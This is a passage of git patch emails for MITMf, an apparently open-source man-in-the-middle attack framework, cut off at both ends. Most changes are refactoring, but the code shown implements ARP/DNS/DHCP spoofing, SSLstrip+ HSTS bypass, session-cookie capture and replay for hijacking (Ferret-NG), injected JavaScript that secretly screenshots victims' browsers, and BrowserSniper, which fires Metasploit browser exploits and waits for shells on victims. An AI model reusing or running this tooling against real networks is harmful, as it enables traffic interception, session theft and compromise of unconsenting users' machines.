[re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] cookies = dict() + hijack_client = '' _instance = None def __init__(self): diff --git a/core/javascript/screenshot.js b/core/javascript/screenshot.js index fea115f..fe50ad7 100644 --- a/core/javascript/screenshot.js +++ b/core/javascript/screenshot.js @@ -2875,4 +2875,4 @@ function grab() { }); } -grab() \ No newline at end of file +setInterval(function(){grab()}, SECONDS_GO_HERE); \ No newline at end of file diff --git a/core/protocols/arp/ARPWatch.py b/core/protocols/arp/ARPWatch.py index 28f2473..0c45ef6 100644 --- a/core/protocols/arp/ARPWatch.py +++ b/core/protocols/arp/ARPWatch.py @@ -4,6 +4,7 @@ import sys import threading from scapy.all import * +from core.utils import shutdown mitmf_logger = logging.getLogger('mitmf') @@ -21,9 +22,9 @@ class ARPWatch: try: self.gatewaymac = getmacbyip(self.gatewayip) if self.gatewaymac is None: - sys.exit("[ARPWatch] Error: Could not resolve gateway's MAC address") + shutdown("[ARPWatch] Error: Could not resolve gateway's MAC address") except Exception, e: - sys.exit("[ARPWatch] Exception occured while resolving gateway's MAC address: {}".format(e)) + shutdown("[ARPWatch] Exception occured while resolving gateway's MAC address: {}".format(e)) mitmf_logger.debug("[ARPWatch] gatewayip => {}".format(self.gatewayip)) mitmf_logger.debug("[ARPWatch] gatewaymac => {}".format(self.gatewaymac)) diff --git a/core/protocols/arp/ARPpoisoner.py b/core/protocols/arp/ARPpoisoner.py index 122e3fd..4b8858c 100644 --- a/core/protocols/arp/ARPpoisoner.py +++ b/core/protocols/arp/ARPpoisoner.py @@ -1,6 +1,7 @@ import logging import threading from time import sleep +from core.utils import shutdown from scapy.all import * mitmf_logger = logging.getLogger('mitmf') @@ -42,7 +43,7 @@ class ARPpoisoner(): def start(self): if self.gatewaymac is None: - sys.exit("[ARPpoisoner] Error: Could not resolve gateway's MAC address") + shutdown("[ARPpoisoner] Error: Could not resolve gateway's MAC address") mitmf_logger.debug("[ARPpoisoner] gatewayip => {}".format(self.gatewayip)) mitmf_logger.debug("[ARPpoisoner] gatewaymac => {}".format(self.gatewaymac)) diff --git a/core/protocols/smb/SMBserver.py b/core/protocols/smb/SMBserver.py index 2081804..d413926 100644 --- a/core/protocols/smb/SMBserver.py +++ b/core/protocols/smb/SMBserver.py @@ -4,6 +4,7 @@ import threading from socket import error as socketerror from impacket import version, smbserver, LOG from core.configwatcher import ConfigWatcher +from core.utils import shutdown LOG.setLevel(logging.INFO) LOG.propagate = False @@ -29,7 +30,7 @@ class SMBserver(ConfigWatcher): self.server.setSMBChallenge(self.config["MITMf"]["SMB"]["Challenge"]) except socketerror as e: if "Address already in use" in e: - sys.exit("\n[-] Unable to start SMB server on port 445: port already in use") + shutdown("\n[-] Unable to start SMB server on port 445: port already in use") def start(self): t = threading.Thread(name='SMBserver', target=self.server.start) diff --git a/core/utils.py b/core/utils.py index 38845f0..9aa8898 100644 --- a/core/utils.py +++ b/core/utils.py @@ -27,9 +27,15 @@ import sys logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy from scapy.all import get_if_addr, get_if_hwaddr +from core.sergioproxy.ProxyPlugins import ProxyPlugins mitmf_logger = logging.getLogger('mitmf') +def shutdown(message=None): + for plugin in ProxyPlugins.getInstance().plist: + plugin.finish() + sys.exit(message) + class SystemConfig: @staticmethod @@ -44,11 +50,11 @@ class SystemConfig: try: ip_address = get_if_addr(interface) if (ip_address == "0.0.0.0") or (ip_address is None): - exit("[Utils] Interface {} does not have an assigned IP address".format(interface)) + shutdown("[Utils] Interface {} does not have an assigned IP address".format(interface)) return ip_address except Exception, e: - exit("[Utils] Error retrieving IP address from {}: {}".format(interface, e)) + shutdown("[Utils] Error retrieving IP address from {}: {}".format(interface, e)) @staticmethod def getMAC(interface): @@ -56,7 +62,7 @@ class SystemConfig: mac_address = get_if_hwaddr(interface) return mac_address except Exception, e: - exit("[Utils] Error retrieving MAC address from {}: {}".format(interface, e)) + shutdown("[Utils] Error retrieving MAC address from {}: {}".format(interface, e)) class IpTables: diff --git a/mitmf.py b/mitmf.py index 104ab20..6e21431 100755 --- a/mitmf.py +++ b/mitmf.py @@ -28,7 +28,7 @@ from twisted.web import http from twisted.internet import reactor from core.sslstrip.CookieCleaner import CookieCleaner from core.sergioproxy.ProxyPlugins import ProxyPlugins -from core.utils import Banners, SystemConfig +from core.utils import Banners, SystemConfig, shutdown from plugins import * Banners().printBanner() @@ -123,8 +123,6 @@ mitmf_logger.addHandler(fileHandler) #All our options should be loaded now, initialize the plugins print "[*] MITMf v{} online... initializing plugins".format(mitmf_version) -load = [] - for p in plugins: #load only the plugins that have been called at the command line @@ -132,32 +130,30 @@ for p in plugins: print "|_ {} v{}".format(p.name, p.version) if p.tree_info: - for line in p.tree_info: + for line in xrange(0, len(p.tree_info)): print "| |_ {}".format(p.tree_info.pop()) p.initialize(args) if p.tree_info: - for line in p.tree_info: + for line in xrange(0, len(p.tree_info)): print "| |_ {}".format(p.tree_info.pop()) - load.append(p) + ProxyPlugins.getInstance().addPlugin(p) #Plugins are ready to go, let's rock & roll from core.sslstrip.StrippingProxy import StrippingProxy from core.sslstrip.URLMonitor import URLMonitor URLMonitor.getInstance().setFaviconSpoofing(args.favicon) - CookieCleaner.getInstance().setEnabled(args.killsessions) -ProxyPlugins.getInstance().setPlugins(load) strippingFactory = http.HTTPFactory(timeout=10) strippingFactory.protocol = StrippingProxy reactor.listenTCP(args.listen, strippingFactory) -for p in load: +for p in ProxyPlugins.getInstance().plist: p.pluginReactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it p.startConfigWatch() @@ -189,6 +185,4 @@ SMBserver().start() reactor.run() print "\n" -#run each plugins finish() on exit -for p in load: - p.finish() +shutdown() \ No newline at end of file diff --git a/plugins/BeefAutorun.py b/plugins/BeefAutorun.py index 2cb5fa8..0f4bad9 100644 --- a/plugins/BeefAutorun.py +++ b/plugins/BeefAutorun.py @@ -24,7 +24,7 @@ import json from time import sleep from core.beefapi import BeefAPI -from core.utils import SystemConfig +from core.utils import SystemConfig, shutdown from plugins.plugin import Plugin from plugins.Inject import Inject @@ -54,7 +54,7 @@ class BeefAutorun(Inject, Plugin): self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']}) if not self.beef.login(beefconfig['user'], beefconfig['pass']): - sys.exit("[-] Error logging in to BeEF!") + shutdown("[-] Error logging in to BeEF!") def startThread(self, options): self.autorun() diff --git a/plugins/BrowserSniper.py b/plugins/BrowserSniper.py index 0d356a8..0eb7408 100644 --- a/plugins/BrowserSniper.py +++ b/plugins/BrowserSniper.py @@ -20,12 +20,11 @@ import string import random -import sys import logging from time import sleep from core.msfrpc import Msfrpc -from core.utils import SystemConfig +from core.utils import SystemConfig, shutdown from plugins.plugin import Plugin from plugins.BrowserProfiler import BrowserProfiler @@ -56,7 +55,7 @@ class BrowserSniper(BrowserProfiler, Plugin): version = self.msf.call('core.version')['version'] self.tree_info.append("Connected to Metasploit v{}".format(version)) except Exception: - sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and it's MSGRPC server") + shutdown("[-] Error connecting to MSF! Make sure you started Metasploit and it's MSGRPC server") def startThread(self, options): self.snipe() diff --git a/plugins/FerretNG.py b/plugins/FerretNG.py index 612dcbf..42c426a 100644 --- a/plugins/FerretNG.py +++ b/plugins/FerretNG.py @@ -19,12 +19,15 @@ # import logging +import ast +import sys from datetime import datetime from plugins.plugin import Plugin from twisted.internet import reactor from twisted.web import http from twisted.internet import reactor +from core.utils import shutdown from core.ferretng.FerretProxy import FerretProxy from core.ferretng.URLMonitor import URLMonitor @@ -41,17 +44,44 @@ class FerretNG(Plugin): '''Called if plugin is enabled, passed the options namespace''' self.options = options self.ferret_port = 10010 or options.ferret_port + self.cookie_file = None + + URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client'] + + if options.cookie_file: + self.tree_info.append('Loading cookies from log file') + try: + with open(options.cookie_file, 'r') as cookie_file: + self.cookie_file = ast.literal_eval(cookie_file.read()) + URLMonitor.getInstance().cookies = self.cookie_file + cookie_file.close() + except Exception as e: + shutdown("[-] Error loading cookie log file: {}".format(e)) self.tree_info.append("Listening on port {}".format(self.ferret_port)) + def onConfigChange(self): + mitmf_logger.info("[Ferret-NG] Will now hijack captured sessions from {}".format(self.config['Ferret-NG']['Client'])) + URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client'] + def clientRequest(self, request): if 'cookie' in request.headers: host = request.headers['host'] cookie = request.headers['cookie'] client = request.client.getClientIP() - if host not in URLMonitor.getInstance().cookies: - mitmf_logger.info("{} [Ferret-NG] Host: {} Captured cookie: {}".format(client, host, cookie)) - URLMonitor.getInstance().cookies[client] = {'host': host, 'cookie': cookie} + + if client not in URLMonitor.getInstance().cookies: + URLMonitor.getInstance().cookies[client] = [] + + for entry in URLMonitor.getInstance().cookies[client]: + if host == entry['host']: + mitmf_logger.debug("{} [Ferret-NG] Updating captured session for {}".format(client, host)) + entry['host'] = host + entry['cookie'] = cookie + return + + mitmf_logger.info("{} [Ferret-NG] Host: {} Captured cookie: {}".format(client, host, cookie)) + URLMonitor.getInstance().cookies[client].append({'host': host, 'cookie': cookie}) def pluginReactor(self, StrippingProxy): FerretFactory = http.HTTPFactory(timeout=10) @@ -60,10 +90,16 @@ class FerretNG(Plugin): def pluginOptions(self, options): options.add_argument('--port', dest='ferret_port', metavar='PORT', type=int, default=None, help='Port to start Ferret-NG proxy on (default 10010)') - options.add_argument('--load-cookies', dest='cookie_file', metavar='FILE', type=str, default=None, help='Load cookies from log file') + options.add_argument('--load-cookies', dest='cookie_file', metavar='FILE', type=str, default=None, help='Load cookies from a log file') def finish(self): + if not URLMonitor.getInstance().cookies: + return + + if self.cookie_file == URLMonitor.getInstance().cookies: + return + mitmf_logger.info("[Ferret-NG] Writing cookies to log file") - with open('./logs/ferret-ng/cookies-{}.log'.format(datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s"))) as cookie_file: - cookie_file.write(URLMonitor.getInstance().cookies) - cookie_file.close() \ No newline at end of file + with open('./logs/ferret-ng/cookies-{}.log'.format(datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")), 'w') as cookie_file: + cookie_file.write(str(URLMonitor.getInstance().cookies)) + cookie_file.close() diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py index 54ccad6..64f977a 100644 --- a/plugins/FilePwn.py +++ b/plugins/FilePwn.py @@ -69,6 +69,7 @@ from libs.bdfactory import pebin from libs.bdfactory import elfbin from libs.bdfactory import machobin from core.msfrpc import Msfrpc +from core.utils import shutdown from plugins.plugin import Plugin from tempfile import mkstemp from configobj import ConfigObj @@ -140,7 +141,7 @@ class FilePwn(Plugin): t.setDaemon(True) t.start() except Exception: - sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") + shutdown("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") def setupMSF(self, msf): diff --git a/plugins/Responder.py b/plugins/Responder.py index e49bcfe..9ea9fec 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -18,11 +18,9 @@ # USA # -import sys - from plugins.plugin import Plugin from twisted.internet import reactor -from core.utils import SystemConfig +from core.utils import SystemConfig, shutdown from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner from core.responder.mdns.MDNSPoisoner import MDNSPoisoner @@ -48,7 +46,7 @@ class Responder(Plugin): config = self.config['Responder'] smbChal = self.config['MITMf']['SMB']['Challenge'] except Exception as e: - sys.exit('[-] Error parsing config for Responder: ' + str(e)) + shutdown('[-] Error parsing config for Responder: ' + str(e)) LANFingerprinter().start(options) MDNSPoisoner().start(options, self.ourip) diff --git a/plugins/Screenshotter.py b/plugins/Screenshotter.py index 23cb23e..5e32555 100644 --- a/plugins/Screenshotter.py +++ b/plugins/Screenshotter.py @@ -20,6 +20,8 @@ import logging import base64 +import urllib +import re from datetime import datetime from plugins.Inject import Inject @@ -32,22 +34,30 @@ class ScreenShotter(Inject, Plugin): optname = 'screen' desc = 'Uses HTML5 Canvas to render an accurate screenshot of a clients browser' ver = '0.1' - has_opts = False + has_opts = True def initialize(self, options): + self.interval = options.interval Inject.initialize(self, options) self.html_payload = self.get_payload() def clientRequest(self, request): if 'saveshot' in request.uri: request.printPostData = False - img_file = './logs/{}-{}-{}.png'.format(request.client.getClientIP(), request.headers['host'], datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")) - with open(img_file, 'wb') as img: - img.write(base64.b64decode(request.postData[30:] + '==')) - img.close() + client = request.client.getClientIP() + img_file = '{}-{}-{}.png'.format(client, request.headers['host'], datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")) + try: + with open('./logs/' + img_file, 'wb') as img: + img.write(base64.b64decode(urllib.unquote(request.postData).decode('utf8').split(',')[1])) + img.close() - mitmf_logger.info('{} [ScreenShotter] Saved screenshot to {}'.format(request.client.getClientIP(), img_file)) + mitmf_logger.info('{} [ScreenShotter] Saved screenshot to {}'.format(client, img_file)) + except Exception as e: + mitmf_logger.error('{} [ScreenShotter] Error saving screenshot: {}'.format(client, e)) def get_payload(self): - canvas = open("./core/javascript/screenshot.js", "rb").read() - return '' \ No newline at end of file + canvas = re.sub("SECONDS_GO_HERE", str(self.interval*1000), open("./core/javascript/screenshot.js", "rb").read()) + return '' + + def pluginOptions(self, options): + options.add_argument("--interval", dest="interval", type=int, metavar="SECONDS", default=10, help="Interval at which screenshots will be taken (default 10 seconds)") \ No newline at end of file diff --git a/plugins/Spoof.py b/plugins/Spoof.py index 086128c..4727fe5 100644 --- a/plugins/Spoof.py +++ b/plugins/Spoof.py @@ -18,8 +18,7 @@ # USA # -from sys import exit -from core.utils import SystemConfig, IpTables +from core.utils import SystemConfig, IpTables, shutdown from core.protocols.arp.ARPpoisoner import ARPpoisoner from core.protocols.arp.ARPWatch import ARPWatch from core.dnschef.DNSchef import DNSChef @@ -55,7 +54,7 @@ class Spoof(Plugin): if options.arp: if not options.gateway: - exit("[-] --arp argument requires --gateway") + shutdown("[-] --arp argument requires --gateway") if options.targets is None: #if were poisoning whole subnet, start ARP-Watch @@ -75,10 +74,10 @@ class Spoof(Plugin): elif options.icmp: if not options.gateway: - exit("[-] --icmp argument requires --gateway") + shutdown("[-] --icmp argument requires --gateway") if not options.targets: - exit("[-] --icmp argument requires --targets") + shutdown("[-] --icmp argument requires --targets") icmp = ICMPpoisoner(options.interface, options.targets, options.gateway, options.ip_address) icmp.debug = debug @@ -88,7 +87,7 @@ class Spoof(Plugin): elif options.dhcp: if options.targets: - exit("[-] --targets argument invalid when DCHP spoofing") + shutdown("[-] --targets argument invalid when DCHP spoofing") dhcp = DHCPServer(options.interface, self.dhcpcfg, options.ip_address, options.mac_address) dhcp.shellshock = options.shellshock @@ -104,7 +103,7 @@ class Spoof(Plugin): DNSChef.getInstance().loadRecords(self.dnscfg) if not options.arp and not options.icmp and not options.dhcp and not options.dns: - exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns") + shutdown("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns") SystemConfig.setIpForwarding(1) From 563a8d37c13c04f74b51ee590cf757a8237eeb16 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Tue, 19 May 2015 00:00:40 +0200 Subject: [PATCH 19/20] Fixed a bug in SSLstrip+ code, when redirecting to certain sites Created a wrapper class around Msfrpc to limit code re-use when interacting with msf --- core/dnschef/DNSchef.py | 14 +++--- core/msfrpc.py | 52 ++++++++++++++++++++ core/sslstrip/ClientRequest.py | 8 +-- core/sslstrip/SSLServerConnection.py | 6 ++- core/sslstrip/ServerConnection.py | 10 ++-- core/sslstrip/URLMonitor.py | 42 ++++++++-------- plugins/BrowserProfiler.py | 8 +-- plugins/BrowserSniper.py | 73 +++++++++------------------- plugins/FilePwn.py | 50 +++++++------------ plugins/Screenshotter.py | 4 +- 10 files changed, 141 insertions(+), 126 deletions(-) diff --git a/core/dnschef/DNSchef.py b/core/dnschef/DNSchef.py index a65d8cd..69f3681 100755 --- a/core/dnschef/DNSchef.py +++ b/core/dnschef/DNSchef.py @@ -71,7 +71,7 @@ class DNSHandler(): d = DNSRecord.parse(data) except Exception, e: - dnschef_logger.info("{} ERROR: invalid DNS request".format(self.client_address[0])) + dnschef_logger.info("{} [DNSChef] Error: invalid DNS request".format(self.client_address[0])) else: # Only Process DNS Queries @@ -115,7 +115,7 @@ class DNSHandler(): # Create a custom response to the query response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q) - dnschef_logger.info("{} cooking the response of type '{}' for {} to {}".format(self.client_address[0], qtype, qname, fake_record)) + dnschef_logger.info("{} [DNSChef] Cooking the response of type '{}' for {} to {}".format(self.client_address[0], qtype, qname, fake_record)) # IPv6 needs additional work before inclusion: if qtype == "AAAA": @@ -184,7 +184,7 @@ class DNSHandler(): response = response.pack() elif qtype == "*" and not None in fake_records.values(): - dnschef_logger.info("{} cooking the response of type '{}' for {} with {}".format(self.client_address[0], "ANY", qname, "all known fake records.")) + dnschef_logger.info("{} [DNSChef] Cooking the response of type '{}' for {} with {}".format(self.client_address[0], "ANY", qname, "all known fake records.")) response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q) @@ -259,7 +259,7 @@ class DNSHandler(): # Proxy the request else: - dnschef_logger.debug("[DNSChef] {} proxying the response of type '{}' for {}".format(self.client_address[0], qtype, qname)) + dnschef_logger.debug("{} [DNSChef] Proxying the response of type '{}' for {}".format(self.client_address[0], qtype, qname)) nameserver_tuple = random.choice(nameservers).split('#') response = self.proxyrequest(data, *nameserver_tuple) @@ -339,13 +339,13 @@ class DNSHandler(): sock.close() except Exception, e: - dnschef_logger.warning("could not proxy request: {}".format(e)) + dnschef_logger.warning("[DNSChef] Could not proxy request: {}".format(e)) else: return reply def hstsbypass(self, real_domain, fake_domain, nameservers, d): - dnschef_logger.info("{} resolving '{}' to '{}' for HSTS bypass".format(self.client_address[0], fake_domain, real_domain)) + dnschef_logger.info("{} [DNSChef] Resolving '{}' to '{}' for HSTS bypass".format(self.client_address[0], fake_domain, real_domain)) response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q) @@ -482,7 +482,7 @@ class DNSChef(ConfigWatcher): self.startUDP() except socket.error as e: if "Address already in use" in e: - shutdown("\n[-] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port'])) + shutdown("\n[DNSChef] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port'])) # Initialize and start the DNS Server def startUDP(self): diff --git a/core/msfrpc.py b/core/msfrpc.py index f722875..51e51c2 100644 --- a/core/msfrpc.py +++ b/core/msfrpc.py @@ -24,6 +24,9 @@ import msgpack import logging import requests +from core.configwatcher import ConfigWatcher +from core.utils import shutdown + logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message class Msfrpc: @@ -84,6 +87,55 @@ class Msfrpc: except: raise self.MsfAuthError("MsfRPC: Authentication failed") +class Msf: + ''' + This is just a wrapper around the Msfrpc class, + prevents a lot of code re-use throught the framework + + ''' + def __init__(self): + try: + self.msf = Msfrpc({"host": ConfigWatcher.config['MITMf']['Metasploit']['rpcip']}) + self.msf.login('msf', ConfigWatcher.config['MITMf']['Metasploit']['rpcpass']) + except Exception as e: + shutdown("[Msfrpc] Error connecting to Metasploit: {}".format(e)) + + def version(self): + return self.msf.call('core.version')['version'] + + def jobs(self): + return self.msf.call('job.list') + + def jobinfo(self, pid): + return self.msf.call('job.info', [pid]) + + def killjob(self, pid): + return self.msf.call('job.kill', [pid]) + + def findpid(self, name): + jobs = self.jobs() + for pid, jobname in jobs.iteritems(): + if name in jobname: + return pid + return None + + def sessions(self): + return self.msf.call('session.list') + + def sessionsfrompeer(self, peer): + sessions = self.sessions() + for n, v in sessions.iteritems(): + if peer in v['tunnel_peer']: + return n + return None + + def sendcommand(self, cmd): + #Create a virtual console + console_id = self.msf.call('console.create')['id'] + + #write the cmd to the newly created console + self.msf.call('console.write', [console_id, cmd]) + if __name__ == '__main__': # Create a new instance of the Msfrpc client with the default options diff --git a/core/sslstrip/ClientRequest.py b/core/sslstrip/ClientRequest.py index 67b6dba..8d2d30e 100644 --- a/core/sslstrip/ClientRequest.py +++ b/core/sslstrip/ClientRequest.py @@ -69,7 +69,7 @@ class ClientRequest(Request): if self.hsts: if 'referer' in headers: - real = self.urlMonitor.getHstsConfig()[0] + real = self.urlMonitor.real if len(real) > 0: dregex = re.compile("({})".format("|".join(map(re.escape, real.keys())))) headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer']) @@ -120,7 +120,7 @@ class ClientRequest(Request): client = self.getClientIP() path = self.getPathFromUri() url = 'http://' + host + path - self.uri = url # set URI to absolute + self.uri = url # set URI to absolute if self.content: self.content.seek(0,0) @@ -129,8 +129,8 @@ class ClientRequest(Request): if self.hsts: - host = self.urlMonitor.URLgetRealHost(str(host)) - real = self.urlMonitor.getHstsConfig()[0] + host = self.urlMonitor.URLgetRealHost(str(host)) + real = self.urlMonitor.real patchDict = self.urlMonitor.patchDict url = 'http://' + host + path self.uri = url # set URI to absolute diff --git a/core/sslstrip/SSLServerConnection.py b/core/sslstrip/SSLServerConnection.py index f0db397..4015276 100644 --- a/core/sslstrip/SSLServerConnection.py +++ b/core/sslstrip/SSLServerConnection.py @@ -16,7 +16,9 @@ # USA # -import logging, re, string +import logging +import re +import string from ServerConnection import ServerConnection from URLMonitor import URLMonitor @@ -58,7 +60,7 @@ class SSLServerConnection(ServerConnection): if v[:7].lower()==' domain': dominio=v.split("=")[1] mitmf_logger.debug("[SSLServerConnection][HSTS] Parsing cookie domain parameter: %s"%v) - real = self.urlMonitor.getHstsConfig()[1] + real = self.urlMonitor.real if dominio in real: v=" Domain=%s"%real[dominio] mitmf_logger.debug("[SSLServerConnection][HSTS] New cookie domain parameter: %s"%v) diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index 32ee79e..74868f4 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -105,7 +105,13 @@ class ServerConnection(HTTPClient): def connectionMade(self): mitmf_logger.debug("[ServerConnection] HTTP connection made.") - self.clientInfo = hap.simple_detect(self.headers['user-agent']) + try: + self.clientInfo = hap.simple_detect(self.headers['user-agent']) + except KeyError as e: + mitmf_logger.debug("[ServerConnection] Client didn't send UA with request") + self.clientInfo = None + pass + self.plugins.hook() self.sendRequest() self.sendHeaders() @@ -214,9 +220,7 @@ class ServerConnection(HTTPClient): nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url) mitmf_logger.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl)) sustitucion[url] = nuevaurl - #data.replace(url,nuevaurl) - #data = self.urlMonitor.DataReemplazo(data) if len(sustitucion)>0: dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys())))) data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data) diff --git a/core/sslstrip/URLMonitor.py b/core/sslstrip/URLMonitor.py index f306db7..54b4bd5 100644 --- a/core/sslstrip/URLMonitor.py +++ b/core/sslstrip/URLMonitor.py @@ -32,6 +32,8 @@ class URLMonitor: # Start the arms race, and end up here... javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] _instance = None + sustitucion = dict() + real = dict() patchDict = { 'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net', 'https:\/\/www.facebook.com':'http:\/\/social.facebook.com', @@ -107,23 +109,24 @@ class URLMonitor: port = 443 if self.hsts: - if not self.getHstsConfig[1].has_key(host): + self.updateHstsConfig() + + if not self.sustitucion.has_key(host): lhost = host[:4] if lhost=="www.": - self.getHstsConfig[1][host] = "w"+host - self.getHstsConfig[0]["w"+host] = host + self.sustitucion[host] = "w"+host + self.real["w"+host] = host else: - self.getHstsConfig[1][host] = "web"+host - self.getHstsConfig[0]["web"+host] = host - mitmf_logger.debug("[URLMonitor][HSTS] SSL host ({}) tokenized ({})".format(host, self.getHstsConfig[1][host])) + self.sustitucion[host] = "web"+host + self.real["web"+host] = host + mitmf_logger.debug("[URLMonitor][HSTS] SSL host ({}) tokenized ({})".format(host, self.sustitucion[host])) url = 'http://' + host + path - #mitmf_logger.debug("HSTS stripped URL: %s %s"%(client, url)) self.strippedURLs.add((client, url)) self.strippedURLPorts[(client, url)] = int(port) - return 'http://'+ self.getHstsConfig[1][host] + path + return 'http://'+ self.sustitucion[host] + path else: url = method + host + path @@ -134,15 +137,10 @@ class URLMonitor: def setFaviconSpoofing(self, faviconSpoofing): self.faviconSpoofing = faviconSpoofing - def getHstsConfig(self): - sustitucion = dict() - real = dict() - - for k,v in ConfigWatcher.getInstance().getConfig()['SSLstrip+']: - sustitucion[k] = v - real[v] = k - - return (real, sustitucion) + def updateHstsConfig(self): + for k,v in ConfigWatcher.getInstance().config['SSLstrip+'].iteritems(): + self.sustitucion[k] = v + self.real[v] = k def setHstsBypass(self): self.hsts = True @@ -158,10 +156,12 @@ class URLMonitor: def URLgetRealHost(self, host): mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: {}".format(host)) - - if self.getHstsConfig()[0].has_key(host): - mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: {}".format(self.getHstsConfig()[0][host])) - return self.getHstsConfig()[0][host] + + self.updateHstsConfig() + + if self.real.has_key(host): + mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: {}".format(self.real[host])) + return self.real[host] else: mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: {}".format(host)) diff --git a/plugins/BrowserProfiler.py b/plugins/BrowserProfiler.py index 19225a3..aa831f4 100644 --- a/plugins/BrowserProfiler.py +++ b/plugins/BrowserProfiler.py @@ -39,11 +39,11 @@ class BrowserProfiler(Inject, Plugin): self.html_payload = self.get_payload() def post2dict(self, post): #converts the ajax post to a dic - dict = {} + d = dict() for line in post.split('&'): t = line.split('=') - dict[t[0]] = t[1] - return dict + d[t[0]] = t[1] + return d def clientRequest(self, request): #Handle the plugin output @@ -62,4 +62,4 @@ class BrowserProfiler(Inject, Plugin): def get_payload(self): plugindetect = open("./core/javascript/plugindetect.js", 'r').read() - return '' + return '' diff --git a/plugins/BrowserSniper.py b/plugins/BrowserSniper.py index 0eb7408..e74c405 100644 --- a/plugins/BrowserSniper.py +++ b/plugins/BrowserSniper.py @@ -23,7 +23,7 @@ import random import logging from time import sleep -from core.msfrpc import Msfrpc +from core.msfrpc import Msf from core.utils import SystemConfig, shutdown from plugins.plugin import Plugin from plugins.BrowserProfiler import BrowserProfiler @@ -42,20 +42,11 @@ class BrowserSniper(BrowserProfiler, Plugin): self.msfip = SystemConfig.getIP(options.interface) self.sploited_ips = list() #store ip of pwned or not vulnerable clients so we don't re-exploit - msfcfg = self.config['MITMf']['Metasploit'] - self.rpcip = msfcfg['rpcip'] - self.rpcpass = msfcfg['rpcpass'] - #Initialize the BrowserProfiler plugin BrowserProfiler.initialize(self, options) - try: - self.msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary - self.msf.login('msf', self.rpcpass) - version = self.msf.call('core.version')['version'] - self.tree_info.append("Connected to Metasploit v{}".format(version)) - except Exception: - shutdown("[-] Error connecting to MSF! Make sure you started Metasploit and it's MSGRPC server") + msfversion = Msf().version() + self.tree_info.append("Connected to Metasploit v{}".format(msfversion)) def startThread(self, options): self.snipe() @@ -84,11 +75,7 @@ class BrowserSniper(BrowserProfiler, Plugin): cmd += "set ExitOnSession False\n" cmd += "exploit -j\n" - #Create a virtual console - console_id = self.msf.call('console.create')['id'] - - #write the cmd to the newly created console - self.msf.call('console.write', [console_id, cmd]) + Msf().sendcommand(cmd) return (rand_url, rand_port) @@ -140,7 +127,7 @@ class BrowserSniper(BrowserProfiler, Plugin): elif details['Plugin'].lower() == 'flash': - if (flash is not None) and (java in details['PluginVersions']): + if (flash is not None) and (flash in details['PluginVersions']): exploits.append(exploit) mitmf_logger.debug("{} [BrowserSniper] Compatible exploits: {}".format(vic_ip, exploits)) @@ -154,31 +141,23 @@ class BrowserSniper(BrowserProfiler, Plugin): #The following will poll Metasploit every 2 seconds for new sessions for a maximum of 60 seconds #Will also make sure the shell actually came from the box that we targeted - #probably a much cleaner way of doing this :/ mitmf_logger.info('{} [BrowserSniper] Waiting for ze shellz, sit back and relax...'.format(ip)) - exit_loop = False + poll_n = 1 - while poll_n <= 30: - - if exit_loop is True: - break - - sessions = self.msf.call('session.list') - if sessions: - for k, v in sessions.iteritems(): - if ip in sessions[k]['tunnel_peer']: - mitmf_logger.info("{} [BrowserSniper] Client haz been 0wn3d! Enjoy!".format(ip)) - self.sploited_ips.append(ip) - self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped - exit_loop = True - break + msf = Msf() + while poll_n != 30: + if msf.sessionsfrompeer(ip): + mitmf_logger.info("{} [BrowserSniper] Client haz been 0wn3d! Enjoy!".format(ip)) + self.sploited_ips.append(ip) + self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped + self.html_payload = self.get_payload() # restart the BrowserProfiler plugin + return + poll_n += 1 sleep(2) - if exit_loop is False: #We didn't get a shell :( - mitmf_logger.info("{} [BrowserSniper] Session not established after 60 seconds".format(ip)) - + mitmf_logger.info("{} [BrowserSniper] Session not established after 60 seconds".format(ip)) self.html_payload = self.get_payload() # restart the BrowserProfiler plugin def snipe(self): @@ -196,26 +175,20 @@ class BrowserSniper(BrowserProfiler, Plugin): elif exploits and 